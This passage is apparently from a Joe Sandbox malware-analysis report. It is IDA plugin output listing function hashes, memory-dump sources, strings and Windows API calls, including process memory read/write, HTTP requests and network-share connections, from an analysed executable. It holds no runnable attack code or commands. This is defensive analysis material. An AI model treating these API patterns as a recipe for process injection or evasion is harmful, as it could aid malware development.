                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                            • String ID: .lnk
                                                                                                                            • API String ID: 886957087-24824748
                                                                                                                            • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                            • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                                                                            • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                            • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                                                                            Strings
                                                                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcslen
                                                                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                            • API String ID: 176396367-557222456
                                                                                                                            • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                                            • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                                                                                            • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                                            • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$ClearCopyInit_malloc
                                                                                                                            • String ID: 4RH
                                                                                                                            • API String ID: 2981388473-749298218
                                                                                                                            • Opcode ID: 35eb6b368d3d727d561940249ac9230275533512fc16219617b5b7e0950dc549
                                                                                                                            • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                                                                            • Opcode Fuzzy Hash: 35eb6b368d3d727d561940249ac9230275533512fc16219617b5b7e0950dc549
                                                                                                                            • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• __wcsnicmp.LIBCMT ref: 0046681A
• WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Connection__wcsnicmp_wcscpy_wcslen
• String ID: LPT$HH
• API String ID: 3035604524-2728063697
• Opcode ID: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
• Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
• Opcode Fuzzy Hash: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
• Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
APIs
  • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
  • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
• SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
Strings
Similarity
• API ID: MessageSend$MemoryProcess$ReadWrite
• String ID: @
• API String ID: 4055202900-2766056989
• Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
• Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
• Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
• Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
APIs
Strings
Similarity
• API ID: CrackInternet_memset_wcslen
• String ID: |
• API String ID: 915713708-2343686810
• Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
• Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
• Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
• Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
• HttpQueryInfoW.WININET ref: 0044A892
  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
Strings
Similarity
• API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
• String ID:
• API String ID: 3705125965-3916222277
• Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
• Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
• Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
• Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
• GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
Strings
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
• Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
• Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
• Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
APIs
• DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
Strings
Similarity
• API ID: DestroyWindow
• String ID: msctls_updown32
• API String ID: 3375834691-2298589950
• Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
• Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
• Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
• Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
• SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
• MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
Strings
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
• Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
• Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
• Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
• Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D243
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
Strings
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: HH
• API String ID: 2507767853-2761332787
• Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
• Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
• Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
• Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D44A
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 2507767853-2761332787
                                                                                                                            • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                            • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                                                                            • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                            • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                                                                            • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID: msctls_trackbar32
                                                                                                                            • API String ID: 3850602802-1010561917
                                                                                                                            • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                            • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                                                                            • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                            • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                            • gethostbyname.WSOCK32(?), ref: 0046BD78
                                                                                                                            • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                                                                            • inet_ntoa.WSOCK32(00000000), ref: 0046BDCD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 1515696956-2761332787
                                                                                                                            • Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                                                            • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                                                                            • Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                                                            • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                            • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                                                                                            • DrawMenuBar.USER32 ref: 00449828
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$InfoItem$Draw_malloc
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 772068139-4108050209
                                                                                                                            • Opcode ID: b3af576e0f2e39512f86611043772d16c6e9a47364665c1dfde5c41d6aa9b3c8
                                                                                                                            • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                                                                            • Opcode Fuzzy Hash: b3af576e0f2e39512f86611043772d16c6e9a47364665c1dfde5c41d6aa9b3c8
                                                                                                                            • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocTask_wcslen
                                                                                                                            • String ID: hkG
                                                                                                                            • API String ID: 2651040394-3610518997
                                                                                                                            • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                            • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                                                                            • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                            • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                            • API String ID: 2574300362-1816364905
                                                                                                                            • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                            • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                                                                            • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                            • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,00000000,?,?,00000101,?,?), ref: 004343DE
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                            • API String ID: 2574300362-58917771
                                                                                                                            • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                            • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                                                                            • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                            • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                            • API String ID: 2574300362-3530519716
                                                                                                                            • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                            • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                                                                            • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                                                            • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                            • API String ID: 2574300362-275556492
                                                                                                                            • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                            • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                                                                            • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                                                            • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,0040E551,?), ref: 0040EE7B
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                                            • API String ID: 2574300362-3024904723
                                                                                                                            • Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                                                                            • Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
